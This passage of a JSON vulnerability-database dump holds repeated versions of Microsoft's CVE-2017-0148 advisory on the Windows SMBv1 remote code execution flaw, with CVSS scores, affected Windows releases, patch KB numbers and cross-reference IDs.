"msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T00:46:29", "differentElements": ["msAffectedSoftware"], "edition": 41}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-13T04:50:53", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012216", "KB4012212", "KB4012215", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB3210721", "KB4013198", "KB4012214", "KB4012217", "KB4012598", "KB4013429", "KB3210720", "KB4012213", "KB3205409", "KB3177186", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T04:50:53", "differentElements": ["msAffectedSoftware"], "edition": 42}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-13T06:59:52", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB3210720", "KB3205401", "KB4013198", "KB4012216", "KB3205409", "KB3212646", "KB3213986", "KB4012213", "KBMS16-110, 3187754", "KB4012212", "KB4012598", "KB4012606", "KB4012217", "KB4013429", "KB4012214", "KB3177186", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T06:59:52", "differentElements": ["msAffectedSoftware"], "edition": 43}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-13T10:45:10", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB3205409", "KB3177186", "KB4012598", "KB4012216", "KB4012217", "KB4013429", "KB3210720", "KB4012212", "KB3205401", "KB4012213", "KB4012606", "KBMS16-110, 3187754", "KB4012215", "KB4013198", "KB3210721", "KB3212646", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": 